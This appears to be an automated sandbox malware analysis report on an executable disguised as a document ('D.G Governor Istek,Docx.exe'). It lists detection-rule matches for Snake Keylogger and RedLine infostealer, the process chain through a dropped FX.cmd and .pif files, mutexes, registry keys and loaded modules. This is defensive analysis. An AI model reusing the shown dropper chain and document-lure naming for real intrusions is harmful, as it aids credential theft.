          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 13.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000004.00000002.3472140687.000000001F670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 6656, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 432, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: xzeheenC.pif PID: 2140, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs Cryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/7@4/4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C7F5C GetDiskFreeSpaceA,0_2_029C7F5C
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D6D50 CoCreateInstance,0_2_029D6D50
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe File created: C:\Users\Public\CneehezxF.cmd
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
          Source: C:\Users\Public\Libraries\xzeheenC.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A4_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A4_1_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A9_2_00413780
          Source: C:\Users\Public\Libraries\xzeheenC.pifCommand line argument: 08A9_1_00413780
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Cneehezx.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: xzeheenC.pif, 00000004.00000002.3471183670.000000001E3EB000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.000000003564B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031E6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: D.G Governor Istek,Docx.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe File read: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe
          Source: unknownProcess created: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe "C:\Users\user\Desktop\D.G Governor Istek,Docx.exe"
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Cneehezx.PIF "C:\Users\Public\Libraries\Cneehezx.PIF"
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Cneehezx.PIFProcess created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: url.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ieframe.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: netapi32.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: wkscli.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ??.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ??l.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: ieproxy.dll
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exe Section loaded: msasn1.dll
